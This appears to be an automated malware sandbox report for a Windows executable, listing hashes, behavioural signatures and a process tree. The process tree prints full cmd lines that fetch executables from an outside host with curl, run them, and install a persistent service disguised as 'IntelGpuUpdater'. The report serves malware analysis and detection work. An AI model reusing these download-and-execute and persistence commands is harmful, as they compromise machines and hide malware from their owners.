Analysis
-
max time kernel
16s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
04-12-2024 19:53
Static task
static1
Behavioral task
behavioral1
Sample
f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe
Resource
win10v2004-20241007-en
General
-
Target
f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe
-
Size
5.3MB
-
MD5
37bc24bd5ce2067bdb0c34c0ca414c00
-
SHA1
3d7b67e7370d79533cb984330f21e5f5c5b9479a
-
SHA256
f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185d
-
SHA512
bf4fe4f5139bd206792b645509aaf42be2d58d3f003a497c799bbd3d860ec5c9193f781e4d1525ddd9f7798f8395d21e96ed74ceeb52c0ab43df3d642758ad8a
-
SSDEEP
98304:aOQGc830HeOIk0ons6U523lPWZIERFog7icldle+HJFD:hrj30qkXnsr2YIIog7if+HJF
Malware Config
Signatures
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 764 f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\IntelGpuUpdater.exe cmd.exe -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 764 f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 764 wrote to memory of 2912 764 f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe 31 PID 764 wrote to memory of 2912 764 f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe 31 PID 764 wrote to memory of 2912 764 f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe 31 PID 764 wrote to memory of 2912 764 f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe 31 PID 2912 wrote to memory of 2344 2912 cmd.exe 32 PID 2912 wrote to memory of 2344 2912 cmd.exe 32 PID 2912 wrote to memory of 2344 2912 cmd.exe 32 PID 2912 wrote to memory of 2344 2912 cmd.exe 32 PID 764 wrote to memory of 2332 764 f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe 33 PID 764 wrote to memory of 2332 764 f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe 33 PID 764 wrote to memory of 2332 764 f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe 33 PID 764 wrote to memory of 2332 764 f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe 33 PID 2332 wrote to memory of 2368 2332 cmd.exe 34 PID 2332 wrote to memory of 2368 2332 cmd.exe 34 PID 2332 wrote to memory of 2368 2332 cmd.exe 34 PID 2332 wrote to memory of 2368 2332 cmd.exe 34 PID 764 wrote to memory of 2384 764 f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe 35 PID 764 wrote to memory of 2384 764 f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe 35 PID 764 wrote to memory of 2384 764 f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe 35 PID 764 wrote to memory of 2384 764 f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe 35 PID 2384 wrote to memory of 1080 2384 cmd.exe 36 PID 2384 wrote to memory of 1080 2384 cmd.exe 36 PID 2384 wrote to memory of 1080 2384 cmd.exe 36 PID 2384 wrote to memory of 1080 2384 cmd.exe 36 PID 764 wrote to memory of 988 764 f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe 37 PID 764 wrote to memory of 988 764 f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe 37 PID 764 wrote to memory of 988 764 f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe 37 PID 764 wrote to memory of 988 764 f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe"C:\Users\Admin\AppData\Local\Temp\f2b45a512a8c3586df555d52c068f516dd0bab1c8a24467bdf3e72055312185dN.exe"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:764 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c "cmd /c sc delete IntelGpuUpdater && cmd /c sc stop IntelGpuUpdater && " > NUL 2>&12⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\SysWOW64\cmd.execmd /c "cmd /c sc delete IntelGpuUpdater && cmd /c sc stop IntelGpuUpdater && "3⤵
- System Location Discovery: System Language Discovery
PID:2344
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c "curl https://dontuseme.ct8.pl/test.exe > %localappdata%\test.exe && start %localappdata%\test.exe && timeout 5 && del %localappdata%\test.exe" > NUL 2>&12⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\SysWOW64\cmd.execmd /c "curl https://dontuseme.ct8.pl/test.exe > C:\Users\Admin\AppData\Local\test.exe && start C:\Users\Admin\AppData\Local\test.exe && timeout 5 && del C:\Users\Admin\AppData\Local\test.exe"3⤵
- System Location Discovery: System Language Discovery
PID:2368
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c "del C:\Windows\IntelGpuUpdater.exe && del C:\Windows\IntelGpuUpdaterHelper.exe && curl https://dontuseme.ct8.pl/test.exe > C:\Windows\IntelGpuUpdater.exe && curl https://dontuseme.ct8.pl/nssm.exe > C:\Windows\IntelGpuUpdaterHelper.exe && C:\Windows\IntelGpuUpdaterHelper.exe install IntelGpuUpdater C:\Windows\IntelGpuUpdater.exe && cmd /c sc start IntelGpuUpdater && cmd /c sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/5000" > NUL 2>&12⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Windows\SysWOW64\cmd.execmd /c "del C:\Windows\IntelGpuUpdater.exe && del C:\Windows\IntelGpuUpdaterHelper.exe && curl https://dontuseme.ct8.pl/test.exe > C:\Windows\IntelGpuUpdater.exe && curl https://dontuseme.ct8.pl/nssm.exe > C:\Windows\IntelGpuUpdaterHelper.exe && C:\Windows\IntelGpuUpdaterHelper.exe install IntelGpuUpdater C:\Windows\IntelGpuUpdater.exe && cmd /c sc start IntelGpuUpdater && cmd /c sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/5000"3⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1080
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c pause2⤵
- System Location Discovery: System Language Discovery
PID:988
-